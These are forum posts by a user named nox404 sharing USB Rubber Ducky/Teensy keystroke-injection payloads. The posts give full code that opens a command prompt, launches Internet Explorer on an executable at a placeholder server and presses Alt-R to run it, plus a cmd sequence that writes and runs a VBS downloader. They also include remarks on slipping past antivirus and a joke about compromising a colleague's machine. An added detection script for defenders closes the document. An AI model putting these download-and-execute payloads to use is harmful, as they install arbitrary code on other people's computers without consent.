Posts posted by nox404

  1. Sorry, do not get me wrong, I love the fact that you guys are actively talking about and working on the VB script.

    I am just working on every way I can think of to download a file using the Ducky. To me, the Ducky is more of a crafted tool and less of a hacksaw that owns everything. More of an "I've got a target, so let me use VB script to download files if they do not have an AV that blocks it, or let me use the Explorer method." I'm hoping that in the long run people will take the information in this thread and add it to the wiki as download methods (I will do it once the wiki is up and I find the time).

    Thank all of you for looking into these methods and helping me refine them!

    ** I tested out the VB script at work and it works flawlessly on our test system.

  2. void setup() { } // no setup needed
    void loop() {
      delay(10000);
      // Windows key  
      Keyboard.set_modifier(MODIFIERKEY_GUI);
      Keyboard.send_now();
      // Windows Key + R to open run
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      // releases the keys
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      //delay for computer
      delay(500);
      //send cmd into run
      Keyboard.print("cmd");
      // for the computer
      delay(50);
      // This hits the enter key
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      
      //Testing Delay
      delay(500);
      //Send to cmd.
      Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
      
      //  Hits Enter key
      delay(50);
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      
      //ALT-R
      delay(3000);
      Keyboard.set_key1(MODIFIERKEY_ALT);
      Keyboard.send_now();
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      // releases the keys
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      //ALT-R
      delay(3000);
      Keyboard.set_key1(MODIFIERKEY_ALT);
      Keyboard.send_now();
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      // releases the keys
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      // another delay :)
      delay(100);
      
        //Send exit to cmd.
      Keyboard.print("exit");
      
      //  Hits Enter key
      delay(50);
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      //this stops it from re running for a bit
      delay(500000);
      
    }

    This is code that I have tested on 4 systems here: Win7 twice and Vista twice.

    This executes Explorer and downloads the file, running it in the process.

    Will change it up so that I can do it all from the run prompt.

    Tell me what you guys think. Oh yeah, got the Ducky today; the thing works like a charm.

    Change a line in the code.

    Now:
     //Send to cmd.
      Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
    
    To:
     //Send to cmd.
      Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe && exit");

    **Thanks to fjux for showing me that "&&" works in Windows to add another command.

    This will close CMD after launching Explorer.

    This code is tested and works better than before.

    With about 15 seconds, I can compromise a system. IT guy at work logs into my system, then somehow I make him look away, plug this bad boy in and bam! J/king, would never use this for "evil".

    Requests: Can some of you guys that have one do some testing on the delay timers and see what you guys find is the best amount of time? All of the ones I have set up are there for testing, so they're a bit long.

  3. void setup() { } // no setup needed
    void loop() {
      delay(10000);
      // Windows key  
      Keyboard.set_modifier(MODIFIERKEY_GUI);
      Keyboard.send_now();
      // Windows Key + R to open run
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      // releases the keys
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      //delay for computer
      delay(500);
      //send cmd into run
      Keyboard.print("cmd");
      // for the computer
      delay(50);
      // This hits the enter key
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      
      //Testing Delay
      delay(500);
      //Send exit to cmd.
      Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
      
      //  Hits Enter key
      delay(50);
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      
      //ALT-R
      delay(3000);
      Keyboard.set_key1(MODIFIERKEY_ALT);
      Keyboard.send_now();
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      // releases the keys
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      //ALT-R
      delay(3000);
      Keyboard.set_key1(MODIFIERKEY_ALT);
      Keyboard.send_now();
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();
      // releases the keys
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      // another delay :)
      delay(100);
      
        //Send exit to cmd.
      Keyboard.print("exit");
      
      //  Hits Enter key
      delay(50);
      Keyboard.set_key1(KEY_ENTER);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      //this stops it from re running for a bit
      delay(500000);
      
    }

    This is code that I have tested on 4 systems here: Win7 twice and Vista twice.

    This executes Explorer and downloads the file, running it in the process.

    Will change it up so that I can do it all from the run prompt.

    Tell me what you guys think. Oh yeah, got the Ducky today; the thing works like a charm.

  4. Yes, it is very true that AVs will find it. I was thinking of using Windows' built-in FTP, but the firewall blocks it by default.

    How about this, guys?

    <start from cmd>
    
    prompt>> "C:\Program Files\Internet Explorer\iexplore.exe" www.YOURSERVER.info/nox404/test.exe
    alt-r
    alt-r
    prompt>> exit

    I tested this with Internet Explorer 8.

    This will open Internet Explorer to a file. From there it will ask you to run, download, etc. You hit Alt-R; this will run the .exe, and then Alt-R again. At this point you will have executed the file. Then type exit and walk away.

    This happens very fast; the IE window does not stay open, it will close on its own. I tested this out with a small bot (10kb) and it worked great, almost instantaneously.

    What do you guys think?

    PS. I will be getting my Ducky today (at least that's what UPS says). Then I can start testing out real-world applications.

  5. Maybe something like this would work: have the Duck load up cmd and type in...

    echo Dim DataBin >dl.vbs
    echo Dim HTTPGET >>dl.vbs
    echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
    echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs 
    echo HTTPGET.Send >>dl.vbs
    echo DataBin = HTTPGET.ResponseBody >>dl.vbs
    echo Const adTypeBinary=1 >>dl.vbs
    echo Const adSaveCreateOverWrite=2 >>dl.vbs
    echo Dim test1 >>dl.vbs
    echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
    echo test1.Type = adTypeBinary >>dl.vbs
    echo test1.Open >>dl.vbs
    echo test1.Write DataBin >>dl.vbs
    echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
    dl.vbs
    file.exe
    exit

    This code will make a VB script that will execute and download a file from a web server. Then you run the file. There are a few antivirus products that detect this as bad, but with some changes it will run well.

    I will be testing it here soon, once my Ducky gets here.

    Tell me what you guys think?
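
For defenders, both methods in these posts leave a recognisable process trail: cmd.exe starting iexplore.exe on a URL that ends in an executable name, and cmd.exe starting a script host on a .vbs file that fetches over HTTP and saves a binary. The following is an added detection example, not code from the posts; the event records, rule names, `example.invalid` hosts and the extension list are constructed assumptions.

```python
import ntpath
import re
import shlex

SHELLS = {"cmd.exe"}
BROWSERS = {"iexplore.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
EXEC_EXT = (".exe", ".scr", ".msi")  # assumption: extend to local policy

# Constructed process-creation records (parent image, image, command line).
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": CMD, "cmdline": "cmd"},
    {"parent": CMD, "image": IE, "cmdline": f'"{IE}" www.example.invalid/THEFILE.exe'},
    {"parent": CMD, "image": IE, "cmdline": f'"{IE}" https://intranet.example.invalid/index.html'},
    {"parent": CMD, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\test\dl.vbs"'},
]

def url_path_is_executable(arg):
    """True when arg looks like host/path and the path ends in an executable extension."""
    rest = re.sub(r"^[a-z][a-z0-9+.-]*://", "", arg.strip('"'), flags=re.I)
    host, sep, path = rest.partition("/")
    path = re.split(r"[?#]", path, maxsplit=1)[0]  # ignore query string and fragment
    return bool(sep) and "." in host and path.lower().endswith(EXEC_EXT)

def classify(ev):
    """Return a rule name for a suspicious shell-spawned process, else None."""
    if ntpath.basename(ev["parent"]).lower() not in SHELLS:
        return None
    image = ntpath.basename(ev["image"]).lower()
    args = shlex.split(ev["cmdline"], posix=False)[1:]  # posix=False keeps backslashes
    if image in BROWSERS and any(url_path_is_executable(a) for a in args):
        return "browser-opened-on-executable-url-from-shell"
    if image in SCRIPT_HOSTS and any(a.strip('"').lower().endswith(".vbs") for a in args):
        return "vbs-run-from-shell"  # low fidelity alone; confirm with vbs_is_downloader
    return None

def vbs_is_downloader(text):
    """Content check for a flagged script: HTTP fetch object plus binary stream save."""
    t = text.lower()
    return all(marker in t for marker in ("xmlhttp", "adodb.stream", "savetofile"))

def findings(events):
    """List (index, rule) for every event that matches a rule."""
    return [(i, rule) for i, ev in enumerate(events) if (rule := classify(ev))]

if __name__ == "__main__":
    for idx, rule in findings(EVENTS):
        print(idx, rule, EVENTS[idx]["cmdline"])
```

The script-host rule fires on legitimate administration scripts too, so it is best treated as a trigger for the content check rather than as an alert by itself.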
